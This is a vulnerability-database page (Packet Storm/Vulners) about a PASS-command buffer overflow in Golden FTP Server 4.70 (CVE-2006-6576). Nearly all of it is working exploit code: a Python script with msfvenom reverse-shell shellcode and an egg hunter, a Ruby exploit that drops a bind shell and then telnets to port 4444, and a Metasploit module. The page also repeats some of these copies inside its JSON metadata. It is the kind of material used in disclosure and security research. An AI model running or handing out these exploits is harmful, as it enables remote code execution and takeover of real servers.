Search...

Golden FTP Server 4.70 Buffer Overflow

2021-03-09T00:00:00

ID PACKETSTORM:161711
Type packetstorm
Reporter Craig Freyman
Modified 2021-03-09T00:00:00

Description

                                        
                                            `# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)  
# Author: 1F98D  
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)  
# Tested on Windows 10 (x64)  
#  
# A buffer overflow exists in GoldenFTP during the authentication process.  
# Note that the source ip address of the user performing the authentication  
# forms part of the buffer and as such must be accounted for when calculating  
# the appropriate offset. It should also be noted that the exploit is  
# rather unstable and if exploitation fails, GoldenFTP will be left in  
# a state where it will still accept connections, but it will be unable  
# to handle or process them in anyway, so be careful.  
#  
#!/usr/local/bin/python3  
  
from socket import *  
import sys  
  
# Your address forms part of the buffer length calculation  
SOURCE = '192.168.1.1'  
TARGET = '192.168.1.2'  
s = socket(AF_INET, SOCK_STREAM)  
s.connect((TARGET, 21))  
  
# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444  
buf = b""  
buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29"  
buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48"  
buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71"  
buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a"  
buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38"  
buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf"  
buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7"  
buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a"  
buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9"  
buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b"  
buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a"  
buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe"  
buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc"  
buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5"  
buf += b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83"  
buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63"  
buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16"  
buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4"  
buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde"  
buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3"  
buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e"  
buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06"  
buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc"  
buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96"  
buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1"  
buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e"  
buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6"  
  
total_length = 545-len(SOURCE)  
eip = b'\x7f\x79\x4c\x00'  
hunter = b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset base on source ip  
hunter += b'\xfd' # std ; set df flag so we search high to low  
hunter += b'\xb8\x43\x42\x41\x40' # mov eax, 0x40414243 ; egg  
hunter += b'\x89\xF7' # mov edi, esi ; start searching from esi  
hunter += b'\x47' # inc edi  
hunter += b'\x90' # nop  
hunter += b'\x83\xC7\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1  
hunter += b'\xaf' # scasd ; check for egg at edi  
hunter += b'\x75\xfa' # short jnz -0x6 ; jump back to add edi, 0x3  
hunter += b'\x83\xC7\x03' # add edi, 0x3  
hunter += b'\xaf' # scasd  
hunter += b'\x75\xfa' # short jnz -0x6  
hunter += b'\x83\xC7\x1f' # add edi, 0x1f ; account for egg hunter  
hunter += b'\xff\xe7' # jmp edi ; egg found, let's go!  
hunter += b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset again  
  
payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip  
  
s.send(b'USER anonymous\r\n')  
print(s.recv(1024))  
print(s.recv(1024))  
s.send(b'PASS ' + payload + b'\r\n')  
print(s.recv(1024))  
s.send(b'QUIT\r\n')  
print(s.recv(1024))  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:161711", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Golden FTP Server 4.70 Buffer Overflow", "description": "", "published": "2021-03-09T00:00:00", "modified": "2021-03-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/161711/Golden-FTP-Server-4.70-Buffer-Overflow.html", "reporter": "Craig Freyman", "references": [], "cvelist": ["CVE-2006-6576"], "lastseen": "2021-03-09T16:24:43", "viewCount": 49, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6576"]}, {"type": "osvdb", "idList": ["OSVDB:35951"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103037", "OPENVAS:1361412562310802024"]}, {"type": "exploitdb", "idList": ["EDB-ID:49629", "EDB-ID:16036", "EDB-ID:17355"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/GOLDENFTP_PASS_BOF"]}], "modified": "2021-03-09T16:24:43", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2021-03-09T16:24:43", "rev": 2}, "vulnersScore": 8.5}, "sourceHref": "https://packetstormsecurity.com/files/download/161711/goldenftp470-overflow.txt", "sourceData": "`# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2) \n# Author: 1F98D \n# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) \n# Tested on Windows 10 (x64) \n# \n# A buffer overflow exists in GoldenFTP during the authentication process. \n# Note that the source ip address of the user performing the authentication \n# forms part of the buffer and as such must be accounted for when calculating \n# the appropriate offset. It should also be noted that the exploit is \n# rather unstable and if exploitation fails, GoldenFTP will be left in \n# a state where it will still accept connections, but it will be unable \n# to handle or process them in anyway, so be careful. \n# \n#!/usr/local/bin/python3 \n \nfrom socket import * \nimport sys \n \n# Your address forms part of the buffer length calculation \nSOURCE = '192.168.1.1' \nTARGET = '192.168.1.2' \ns = socket(AF_INET, SOCK_STREAM) \ns.connect((TARGET, 21)) \n \n# msfvenom -p windows/shell_reverse_tcp -f python -b '\\x00\\x0a\\x0d' LHOST=192.168.1.1 LPORT=4444 \nbuf = b\"\" \nbuf += b\"\\xba\\x1e\\xb6\\xaa\\x95\\xda\\xc3\\xd9\\x74\\x24\\xf4\\x5d\\x29\" \nbuf += b\"\\xc9\\xb1\\x52\\x83\\xc5\\x04\\x31\\x55\\x0e\\x03\\x4b\\xb8\\x48\" \nbuf += b\"\\x60\\x8f\\x2c\\x0e\\x8b\\x6f\\xad\\x6f\\x05\\x8a\\x9c\\xaf\\x71\" \nbuf += b\"\\xdf\\x8f\\x1f\\xf1\\x8d\\x23\\xeb\\x57\\x25\\xb7\\x99\\x7f\\x4a\" \nbuf += b\"\\x70\\x17\\xa6\\x65\\x81\\x04\\x9a\\xe4\\x01\\x57\\xcf\\xc6\\x38\" \nbuf += b\"\\x98\\x02\\x07\\x7c\\xc5\\xef\\x55\\xd5\\x81\\x42\\x49\\x52\\xdf\" \nbuf += b\"\\x5e\\xe2\\x28\\xf1\\xe6\\x17\\xf8\\xf0\\xc7\\x86\\x72\\xab\\xc7\" \nbuf += b\"\\x29\\x56\\xc7\\x41\\x31\\xbb\\xe2\\x18\\xca\\x0f\\x98\\x9a\\x1a\" \nbuf += b\"\\x5e\\x61\\x30\\x63\\x6e\\x90\\x48\\xa4\\x49\\x4b\\x3f\\xdc\\xa9\" \nbuf += b\"\\xf6\\x38\\x1b\\xd3\\x2c\\xcc\\xbf\\x73\\xa6\\x76\\x1b\\x85\\x6b\" \nbuf += b\"\\xe0\\xe8\\x89\\xc0\\x66\\xb6\\x8d\\xd7\\xab\\xcd\\xaa\\x5c\\x4a\" \nbuf += b\"\\x01\\x3b\\x26\\x69\\x85\\x67\\xfc\\x10\\x9c\\xcd\\x53\\x2c\\xfe\" \nbuf += b\"\\xad\\x0c\\x88\\x75\\x43\\x58\\xa1\\xd4\\x0c\\xad\\x88\\xe6\\xcc\" \nbuf += b\"\\xb9\\x9b\\x95\\xfe\\x66\\x30\\x31\\xb3\\xef\\x9e\\xc6\\xb4\\xc5\" \nbuf += b\"\\x67\\x58\\x4b\\xe6\\x97\\x71\\x88\\xb2\\xc7\\xe9\\x39\\xbb\\x83\" \nbuf += b\"\\xe9\\xc6\\x6e\\x03\\xb9\\x68\\xc1\\xe4\\x69\\xc9\\xb1\\x8c\\x63\" \nbuf += b\"\\xc6\\xee\\xad\\x8c\\x0c\\x87\\x44\\x77\\xc7\\x68\\x30\\x76\\x16\" \nbuf += b\"\\x01\\x43\\x78\\x09\\x8d\\xca\\x9e\\x43\\x3d\\x9b\\x09\\xfc\\xa4\" \nbuf += b\"\\x86\\xc1\\x9d\\x29\\x1d\\xac\\x9e\\xa2\\x92\\x51\\x50\\x43\\xde\" \nbuf += b\"\\x41\\x05\\xa3\\x95\\x3b\\x80\\xbc\\x03\\x53\\x4e\\x2e\\xc8\\xa3\" \nbuf += b\"\\x19\\x53\\x47\\xf4\\x4e\\xa5\\x9e\\x90\\x62\\x9c\\x08\\x86\\x7e\" \nbuf += b\"\\x78\\x72\\x02\\xa5\\xb9\\x7d\\x8b\\x28\\x85\\x59\\x9b\\xf4\\x06\" \nbuf += b\"\\xe6\\xcf\\xa8\\x50\\xb0\\xb9\\x0e\\x0b\\x72\\x13\\xd9\\xe0\\xdc\" \nbuf += b\"\\xf3\\x9c\\xca\\xde\\x85\\xa0\\x06\\xa9\\x69\\x10\\xff\\xec\\x96\" \nbuf += b\"\\x9d\\x97\\xf8\\xef\\xc3\\x07\\x06\\x3a\\x40\\x37\\x4d\\x66\\xe1\" \nbuf += b\"\\xd0\\x08\\xf3\\xb3\\xbc\\xaa\\x2e\\xf7\\xb8\\x28\\xda\\x88\\x3e\" \nbuf += b\"\\x30\\xaf\\x8d\\x7b\\xf6\\x5c\\xfc\\x14\\x93\\x62\\x53\\x14\\xb6\" \n \ntotal_length = 545-len(SOURCE) \neip = b'\\x7f\\x79\\x4c\\x00' \nhunter = b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset base on source ip \nhunter += b'\\xfd' # std ; set df flag so we search high to low \nhunter += b'\\xb8\\x43\\x42\\x41\\x40' # mov eax, 0x40414243 ; egg \nhunter += b'\\x89\\xF7' # mov edi, esi ; start searching from esi \nhunter += b'\\x47' # inc edi \nhunter += b'\\x90' # nop \nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1 \nhunter += b'\\xaf' # scasd ; check for egg at edi \nhunter += b'\\x75\\xfa' # short jnz -0x6 ; jump back to add edi, 0x3 \nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3 \nhunter += b'\\xaf' # scasd \nhunter += b'\\x75\\xfa' # short jnz -0x6 \nhunter += b'\\x83\\xC7\\x1f' # add edi, 0x1f ; account for egg hunter \nhunter += b'\\xff\\xe7' # jmp edi ; egg found, let's go! \nhunter += b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset again \n \npayload = hunter + buf + b'\\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip \n \ns.send(b'USER anonymous\\r\\n') \nprint(s.recv(1024)) \nprint(s.recv(1024)) \ns.send(b'PASS ' + payload + b'\\r\\n') \nprint(s.recv(1024)) \ns.send(b'QUIT\\r\\n') \nprint(s.recv(1024)) \n \n`\n", "immutableFields": []}

{"cve": [{"lastseen": "2021-03-17T13:24:24", "description": "Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1.92 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long PASS command. NOTE: it was later reported that 4.70 is also affected. NOTE: the USER vector is already covered by CVE-2005-0634.", "edition": 6, "cvss3": {}, "published": "2006-12-15T19:28:00", "title": "CVE-2006-6576", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-6576"], "modified": "2021-03-16T19:23:00", "cpe": ["cpe:/a:goldenftpserver:golden_ftp_server:1.92"], "id": "CVE-2006-6576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6576", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:goldenftpserver:golden_ftp_server:1.92:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T22:58:57", "description": "Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit. CVE-2006-6576. Remote exploit for windows platform", "published": "2011-01-23T00:00:00", "type": "exploitdb", "title": "Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2011-01-23T00:00:00", "id": "EDB-ID:16036", "href": "https://www.exploit-db.com/exploits/16036/", "sourceData": "#GoldenFTP 4.70 PASS Exploit\r\n#Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)\r\n#Tested on XP SP3 \r\n#Vendor Contacted: 1/17/2011 (no response)\r\n#For this exploit to work correctly, you need to know the subnet that the server \r\n#is running on. You also need to make sure that \"show new connections\" is checked in the options.\r\n#The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.\r\n#528 is the offset when server running on 192.168.236.0 \r\n#533 is the offset when server running on 10.0.1.0 \r\n#530 is the offset when server running on 192.168.1.0 \r\n#531 is the offset when server running on 172.16.1.0 \r\n\r\nrequire 'net/ftp'\r\n\r\n#Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes\r\nshellcode = (\"\\x2b\\xc9\\xb1\\x56\\xba\\x96\\x70\\x11\\x9e\\xdb\\xd0\\xd9\\x74\\x24\" +\r\n\"\\xf4\\x58\\x31\\x50\\x10\\x03\\x50\\x10\\x83\\xe8\\xfc\\x74\\x85\\xed\" +\r\n\"\\x76\\xf1\\x66\\x0e\\x87\\x61\\xee\\xeb\\xb6\\xb3\\x94\\x78\\xea\\x03\" +\r\n\"\\xde\\x2d\\x07\\xe8\\xb2\\xc5\\x9c\\x9c\\x1a\\xe9\\x15\\x2a\\x7d\\xc4\" +\r\n\"\\xa6\\x9b\\x41\\x8a\\x65\\xba\\x3d\\xd1\\xb9\\x1c\\x7f\\x1a\\xcc\\x5d\" +\r\n\"\\xb8\\x47\\x3f\\x0f\\x11\\x03\\x92\\xbf\\x16\\x51\\x2f\\xbe\\xf8\\xdd\" +\r\n\"\\x0f\\xb8\\x7d\\x21\\xfb\\x72\\x7f\\x72\\x54\\x09\\x37\\x6a\\xde\\x55\" +\r\n\"\\xe8\\x8b\\x33\\x86\\xd4\\xc2\\x38\\x7c\\xae\\xd4\\xe8\\x4d\\x4f\\xe7\" +\r\n\"\\xd4\\x01\\x6e\\xc7\\xd8\\x58\\xb6\\xe0\\x02\\x2f\\xcc\\x12\\xbe\\x37\" +\r\n\"\\x17\\x68\\x64\\xb2\\x8a\\xca\\xef\\x64\\x6f\\xea\\x3c\\xf2\\xe4\\xe0\" +\r\n\"\\x89\\x71\\xa2\\xe4\\x0c\\x56\\xd8\\x11\\x84\\x59\\x0f\\x90\\xde\\x7d\" +\r\n\"\\x8b\\xf8\\x85\\x1c\\x8a\\xa4\\x68\\x21\\xcc\\x01\\xd4\\x87\\x86\\xa0\" +\r\n\"\\x01\\xb1\\xc4\\xac\\xe6\\x8f\\xf6\\x2c\\x61\\x98\\x85\\x1e\\x2e\\x32\" +\r\n\"\\x02\\x13\\xa7\\x9c\\xd5\\x54\\x92\\x58\\x49\\xab\\x1d\\x98\\x43\\x68\" +\r\n\"\\x49\\xc8\\xfb\\x59\\xf2\\x83\\xfb\\x66\\x27\\x03\\xac\\xc8\\x98\\xe3\" +\r\n\"\\x1c\\xa9\\x48\\x8b\\x76\\x26\\xb6\\xab\\x78\\xec\\xc1\\xec\\xb6\\xd4\" +\r\n\"\\x81\\x9a\\xba\\xea\\x34\\x06\\x32\\x0c\\x5c\\xa6\\x12\\x86\\xc9\\x04\" +\r\n\"\\x41\\x1f\\x6d\\x77\\xa3\\x33\\x26\\xef\\xfb\\x5d\\xf0\\x10\\xfc\\x4b\" +\r\n\"\\x52\\xbd\\x54\\x1c\\x21\\xad\\x60\\x3d\\x36\\xf8\\xc0\\x34\\x0e\\x6a\" +\r\n\"\\x9a\\x28\\xdc\\x0b\\x9b\\x60\\xb6\\xa8\\x0e\\xef\\x47\\xa7\\x32\\xb8\" +\r\n\"\\x10\\xe0\\x85\\xb1\\xf5\\x1c\\xbf\\x6b\\xe8\\xdd\\x59\\x53\\xa8\\x39\" +\r\n\"\\x9a\\x5a\\x30\\xcc\\xa6\\x78\\x22\\x08\\x26\\xc5\\x16\\xc4\\x71\\x93\" +\r\n\"\\xc0\\xa2\\x2b\\x55\\xbb\\x7c\\x87\\x3f\\x2b\\xf9\\xeb\\xff\\x2d\\x06\" +\r\n\"\\x26\\x76\\xd1\\xb6\\x9f\\xcf\\xed\\x76\\x48\\xd8\\x96\\x6b\\xe8\\x27\" +\r\n\"\\x4d\\x28\\x18\\x62\\xcc\\x18\\xb1\\x2b\\x84\\x19\\xdc\\xcb\\x72\\x5d\" +\r\n\"\\xd9\\x4f\\x77\\x1d\\x1e\\x4f\\xf2\\x18\\x5a\\xd7\\xee\\x50\\xf3\\xb2\" +\r\n\"\\x10\\xc7\\xf4\\x96\\x1b\")\r\n\r\nputs \"[*]This exploit requires knowledge of the local \\n[*]subnet the ftp server is running on.\"\r\nputs \"[*]It will not work unless it is one of these: \\n-->10.0.1.0\\n-->192.168.1.0\\n-->172.16.1.0\\n-->192.168.236.0\\n[*]If your subnet isn't listed, figure out the offset on your own.\"\r\nputs \"[*]Enter the IP of the GoldenFTP Server\"\r\nhost = gets.chomp \r\n\r\n#Get the subnet so we can figure out the offset\r\nputs \"Which subnet is the FTP server running on?\"\r\nputs \"1 --> 10.0.1.0\" \r\nputs \"2 --> 192.168.1.0\" \r\nputs \"3 --> 172.16.1.0\" \r\nputs \"4 --> 192.168.236.0\" \r\nsubnet = gets.chomp \r\n \r\njunk = \"\\x01\" + \"\\x90\" * 19\r\neip = \"\\x4e\\xae\\x45\\x7e\"\r\n\r\npadto529 = \"\\x90\" * 136\r\npadto527 = \"\\x90\" * 134\r\npadto526 = \"\\x90\" * 133\r\npadto524 = \"\\x90\" * 131\r\n \r\nif subnet ==\"1\"\r\n\tbuffer = junk + shellcode + padto529 + eip # buffer is 529 total bytes\r\nelsif subnet ==\"2\"\r\n\tbuffer = junk + shellcode + padto526 + eip # buffer is 526 total bytes\r\nelsif subnet ==\"3\"\r\n\tbuffer = junk + shellcode + padto527 + eip # buffer is 527 total bytes\r\nelsif subnet ==\"4\"\r\n\tbuffer = junk + shellcode + padto524 + eip # buffer is 524 total bytes\r\nend\r\n\r\nftp = Net::FTP.new(host)\r\n \r\nputs \"++ Connecting to target...\\n\"\r\n \r\nftp.login(user=\"anonymous\", passwd=(buffer)) \r\nftp.passive = true\r\n\r\nsleep(2)\r\n \r\nftp.close\r\n\r\nputs \"++ Connecting to target on port 4444....\\n\"\r\nsleep(2)\r\n\r\ncommand= \"telnet \"+ host +\" 4444\"\r\n \r\nsystem(command)\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16036/"}, {"lastseen": "2016-02-02T07:42:01", "description": "GoldenFTP PASS Stack Buffer Overflow. CVE-2006-6576. Remote exploit for windows platform", "published": "2011-06-02T00:00:00", "type": "exploitdb", "title": "Golden FTP 4.70 - PASS Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2011-06-02T00:00:00", "id": "EDB-ID:17355", "href": "https://www.exploit-db.com/exploits/17355/", "sourceData": "#\r\n# $Id: goldenftp_pass_bof.rb 12812 2011-06-02 01:10:22Z bannedit $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'GoldenFTP PASS Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the Golden\r\n\t\t\t\tFTP service. This module uses the PASS command to trigger the overflow.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'bannedit' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12812 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'BID', '45957 '],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/16036/'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 350,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['win'],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x00a93ca6,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t]\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 23 2011'))\r\n\tend\r\n\t\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\t\tprint_status(\"FTP Banner: #{banner}\".strip)\r\n\t\tif banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\"\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tif datastore['RHOST'].length < 15\r\n\t\t\tpad = make_nops(1) * (15 - datastore['RHOST'].length)\r\n\t\tend\r\n\t\t\r\n\t\tsploit = make_nops(4) * 38\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << pad\r\n\t\tsploit << make_nops(1) * (528 - sploit.length)\r\n\t\tsploit << [target.ret].pack('V')\r\n\r\n\t\tprint_status(\"Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}\")\r\n\t\tbegin\r\n\t\t\tconnect\r\n\t\t\tsend_user(\"anonymous\")\r\n\t\t\tsend_cmd(['PASS', sploit], false)\r\n\t\t\thandler\r\n\t\trescue EOFError\r\n\t\tend\r\n\tend\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17355/"}, {"lastseen": "2021-03-09T16:31:52", "description": "", "published": "2021-03-09T00:00:00", "type": "exploitdb", "title": "Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2021-03-09T00:00:00", "id": "EDB-ID:49629", "href": "https://www.exploit-db.com/exploits/49629", "sourceData": "# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)\r\n# Author: 1F98D\r\n# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)\r\n# Tested on Windows 10 (x64)\r\n#\r\n# A buffer overflow exists in GoldenFTP during the authentication process.\r\n# Note that the source ip address of the user performing the authentication\r\n# forms part of the buffer and as such must be accounted for when calculating\r\n# the appropriate offset. It should also be noted that the exploit is\r\n# rather unstable and if exploitation fails, GoldenFTP will be left in\r\n# a state where it will still accept connections, but it will be unable\r\n# to handle or process them in anyway, so be careful.\r\n#\r\n#!/usr/local/bin/python3\r\n\r\nfrom socket import *\r\nimport sys\r\n\r\n# Your address forms part of the buffer length calculation\r\nSOURCE = '192.168.1.1'\r\nTARGET = '192.168.1.2'\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((TARGET, 21))\r\n\r\n# msfvenom -p windows/shell_reverse_tcp -f python -b '\\x00\\x0a\\x0d' LHOST=192.168.1.1 LPORT=4444\r\nbuf = b\"\"\r\nbuf += b\"\\xba\\x1e\\xb6\\xaa\\x95\\xda\\xc3\\xd9\\x74\\x24\\xf4\\x5d\\x29\"\r\nbuf += b\"\\xc9\\xb1\\x52\\x83\\xc5\\x04\\x31\\x55\\x0e\\x03\\x4b\\xb8\\x48\"\r\nbuf += b\"\\x60\\x8f\\x2c\\x0e\\x8b\\x6f\\xad\\x6f\\x05\\x8a\\x9c\\xaf\\x71\"\r\nbuf += b\"\\xdf\\x8f\\x1f\\xf1\\x8d\\x23\\xeb\\x57\\x25\\xb7\\x99\\x7f\\x4a\"\r\nbuf += b\"\\x70\\x17\\xa6\\x65\\x81\\x04\\x9a\\xe4\\x01\\x57\\xcf\\xc6\\x38\"\r\nbuf += b\"\\x98\\x02\\x07\\x7c\\xc5\\xef\\x55\\xd5\\x81\\x42\\x49\\x52\\xdf\"\r\nbuf += b\"\\x5e\\xe2\\x28\\xf1\\xe6\\x17\\xf8\\xf0\\xc7\\x86\\x72\\xab\\xc7\"\r\nbuf += b\"\\x29\\x56\\xc7\\x41\\x31\\xbb\\xe2\\x18\\xca\\x0f\\x98\\x9a\\x1a\"\r\nbuf += b\"\\x5e\\x61\\x30\\x63\\x6e\\x90\\x48\\xa4\\x49\\x4b\\x3f\\xdc\\xa9\"\r\nbuf += b\"\\xf6\\x38\\x1b\\xd3\\x2c\\xcc\\xbf\\x73\\xa6\\x76\\x1b\\x85\\x6b\"\r\nbuf += b\"\\xe0\\xe8\\x89\\xc0\\x66\\xb6\\x8d\\xd7\\xab\\xcd\\xaa\\x5c\\x4a\"\r\nbuf += b\"\\x01\\x3b\\x26\\x69\\x85\\x67\\xfc\\x10\\x9c\\xcd\\x53\\x2c\\xfe\"\r\nbuf += b\"\\xad\\x0c\\x88\\x75\\x43\\x58\\xa1\\xd4\\x0c\\xad\\x88\\xe6\\xcc\"\r\nbuf += b\"\\xb9\\x9b\\x95\\xfe\\x66\\x30\\x31\\xb3\\xef\\x9e\\xc6\\xb4\\xc5\"\r\nbuf += b\"\\x67\\x58\\x4b\\xe6\\x97\\x71\\x88\\xb2\\xc7\\xe9\\x39\\xbb\\x83\"\r\nbuf += b\"\\xe9\\xc6\\x6e\\x03\\xb9\\x68\\xc1\\xe4\\x69\\xc9\\xb1\\x8c\\x63\"\r\nbuf += b\"\\xc6\\xee\\xad\\x8c\\x0c\\x87\\x44\\x77\\xc7\\x68\\x30\\x76\\x16\"\r\nbuf += b\"\\x01\\x43\\x78\\x09\\x8d\\xca\\x9e\\x43\\x3d\\x9b\\x09\\xfc\\xa4\"\r\nbuf += b\"\\x86\\xc1\\x9d\\x29\\x1d\\xac\\x9e\\xa2\\x92\\x51\\x50\\x43\\xde\"\r\nbuf += b\"\\x41\\x05\\xa3\\x95\\x3b\\x80\\xbc\\x03\\x53\\x4e\\x2e\\xc8\\xa3\"\r\nbuf += b\"\\x19\\x53\\x47\\xf4\\x4e\\xa5\\x9e\\x90\\x62\\x9c\\x08\\x86\\x7e\"\r\nbuf 